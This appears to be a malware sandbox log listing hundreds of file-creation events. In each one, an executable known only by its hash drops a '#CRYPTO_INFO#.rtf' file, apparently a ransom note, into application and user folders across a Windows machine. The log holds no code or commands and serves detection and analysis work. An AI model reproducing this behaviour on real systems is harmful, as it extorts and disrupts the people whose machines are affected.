C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\DeviceSearchCache\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\META-INF\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\VideoLAN\VLC\locale\eu\LC_MESSAGES\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\cs-cz\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\fr-ma\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\js\nls\pt-br\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{bccb2fd3-a35e-4e30-8d3c-aa2f1450f3ba}\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\ja-jp\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\de-de\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\da-dk\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\locale\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\sk-sk\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\da-dk\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\UProof\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Java\jdk1.8.0_66\jre\lib\security\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\hr-hr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\eu-es\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\js\nls\es-es\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\VideoLAN\VLC\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\VideoLAN\VLC\locale\es\LC_MESSAGES\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\zh-tw\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\ca-es\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Platform Notifications\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\ro-ro\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\Videos\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\da-dk\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\ja-jp\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\qml\QtQuick\Window.2\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\pa-Arab-PK\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\tr-tr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\eu-es\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\fr-ma\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Local\ConnectedDevicesPlatform\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\Pictures\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\root\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\uk-ua\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\it-it\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\eu-es\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\ja-jp\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\images\themes\dark\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\w0w630d3.default-release\cache2\doomed\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\VideoLAN\VLC\locale\hu\LC_MESSAGES\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\fr-fr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\adm\pl\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\bn-IN\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\ko-kr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\fr-ma\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\hr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Public\Documents\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\de-de\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Java\jre1.8.0_66\lib\management\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\da-dk\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\hu-hu\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\fi-fi\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\hu-hu\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\fr-ma\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\viewer\nls\sv-se\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Java\jdk1.8.0_66\include\win32\bridge\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\ky\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\fi-fi\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\fr-ma\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\zh-tw\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\sk-sk\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\root\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\pl-pl\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\js\plugins\rhp\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\ro-ro\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\viewer\nls\nl-nl\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\core\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\VideoLAN\VLC\locale\ru\LC_MESSAGES\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\hr-hr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\VideoLAN\VLC\locale\be\LC_MESSAGES\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\hu-hu\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\zh-cn\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\pl-pl\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\com.jrockit.mc.feature.console_5.5.0.165303\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\cs-cz\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\da-dk\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\eu-es\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\eu-es\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Settings_{0dfb94c0-ff42-4734-be68-ae9a6e2e795f}\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\VideoLAN\VLC\locale\mn\LC_MESSAGES\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\de-de\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\en-ae\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\uk-ua\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\nl-nl\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\ko-kr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\en-il\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\en-ae\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\libs\require\2.1.15\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\sk-sk\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\sl-si\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\pt-br\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\LogoImages\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\Favorites\Links\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\images\themes\dark\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\css\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\he-il\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\VideoLAN\VLC\locale\as_IN\LC_MESSAGES\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\plugins\rhp\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\pt-br\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Roaming\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\fi-fi\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\cs-cz\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\eu-es\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\es-es\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\fr-fr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\VideoLAN\VLC\locale\my\LC_MESSAGES\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\images\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\ext\locale\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\de-de\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\ru-ru\#CRYPTO_INFO#.rtf 